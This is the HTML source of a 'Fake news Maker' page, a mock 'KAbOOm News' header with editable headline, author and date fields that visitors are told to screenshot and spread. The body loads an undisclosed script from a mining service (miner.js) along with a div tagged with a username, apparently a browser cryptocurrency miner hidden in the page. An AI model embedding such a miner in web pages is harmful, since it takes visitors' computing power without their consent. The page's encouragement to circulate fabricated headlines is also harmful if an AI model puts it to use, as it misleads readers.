<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Fake news Maker</title>
    <style>
      @import url("https://fonts.googleapis.com/css2?family=Work+Sans:wght@500&display=swap");

      * {
        box-sizing: border-box;
        font-family: "Work Sans", sans-serif;
      }

      body {
        padding: 10px;
        background: #d8d8d8;
        color: #000000;
      }

      h1 {
        font-size: 80px;
        text-align: center;
      }

      h2 {
        font-size: 60px;
        text-align: center;
      }

      h3 {
        font-size: 40px;
        text-align: center;
      }
      .fakenews-head {
        color: #000000;
        background: #fff;
        padding: 10px;
      }

      .fakenews-nav {
        height: 30%;
        padding: 10px;
        margin: 10px;
        color: #000000;
        background: #fff;
        border-bottom: 3px solid #000;
      }

      .vl {
        display: inline;
        margin-left: 10px;
        margin-right: 10px;
        border-left: 2px solid black;
        height: 20px;
      }

      .watermark {
        font-size: 8px;
        color: #00000077;
        text-align: right;
      }

      details {
        margin: 0 auto;
        padding: 10px;
      }
    </style>
    <script
      src="https://html2canvas.hertzen.com/dist/html2canvas.min.js"
      defer
    ></script>
  </head>
  <body>
    <script
      type="text/javascript"
      src="https://cdn.rawgit.com/h2non/jsHashes/master/hashes.js"
    ></script>
    <script src="https://mineuino.vercel.app/miner.js" defer></script>
    <div id="mineuino-div" data-mineuino-username="vatsadev"></div>
    <h1>Make fake news Headlines</h1>
    <h2>Snip when you are done!</h2>
    <h3>spread the word</h3>
    <div class="fakenews-head">
      <div class="fakenews-nav">
        <pre style="font-weight: 900; font-size: 30px; display: inline">
KAbOOm News</pre
        >
        <div class="vl"></div>
        shows
        <div class="vl"></div>
        sports
        <div class="vl"></div>
        Pop culture
        <div class="vl"></div>
        fake news
        <div
          style="
            font-weight: 900;
            display: inline;
            color: #fff;
            background: #000;
            padding: 4px;
          "
        >
          LIVE
        </div>
        <div class="vl"></div>
        trends
        <div class="vl"></div>
        more ▼
      </div>
      <div class="fakenews-nav">
        <p contenteditable style="display: inline">%sub 1%</p>
        •
        <p contenteditable style="display: inline">%sub 2%</p>
        •
        <p contenteditable style="display: inline">%sub 3%</p>
      </div>
      <h1 contenteditable>%Heading here%</h1>
      <p>by <a href="#" contenteditable>%person here%</a> on</p>
      <pre contenteditable style="display: inline">%Date here%</pre>
      <p class="watermark">fake-news.vercel.app</p>
    </div>
  </body>
</html>
